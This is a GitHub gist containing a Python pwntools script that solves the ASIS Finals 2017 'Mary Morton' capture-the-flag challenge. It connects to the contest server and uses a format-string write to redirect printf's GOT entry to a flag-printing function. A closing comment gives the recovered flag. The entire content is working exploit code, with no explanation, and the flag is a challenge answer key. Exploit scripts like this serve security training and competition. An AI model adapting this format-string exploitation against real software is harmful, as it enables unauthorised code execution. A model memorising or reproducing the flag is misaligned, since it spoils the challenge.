Created
September 10, 2017 19:50
-
-
Save faidamine/ae4d8662f88ae116db453c7465ceb662 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#usr/bin/python | |
#Faid Mohammed Amine | |
#Fb : piratuer | |
### [pwn] ASIS Finals 2017 - Mary Morton | |
from pwn import * | |
from formatStringExploiter.FormatString import FormatString | |
elf = ELF("./mary_morton") | |
getflag = 0x4008DA | |
r = remote("146.185.132.36",19153) | |
def exploit(pld): | |
r.recvuntil("3. Exit the battle") | |
print("Sending: " + repr(pld)) | |
r.sendline("2") | |
r.sendline(pld) | |
ret = r.recvuntil("1. Stack Bufferoverflow Bug",drop=True) | |
r.recvuntil("Exit the battle \n") | |
return ret | |
payload = FormatString(exploit,elf=elf,index=6,pad=0,explore_stack=False) | |
payload.write_q(elf.symbols['got.printf'], getflag) | |
r.interactive() | |
#ASIS{An_impROv3d_v3r_0f_f41rY_iN_fairy_lAnds!} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment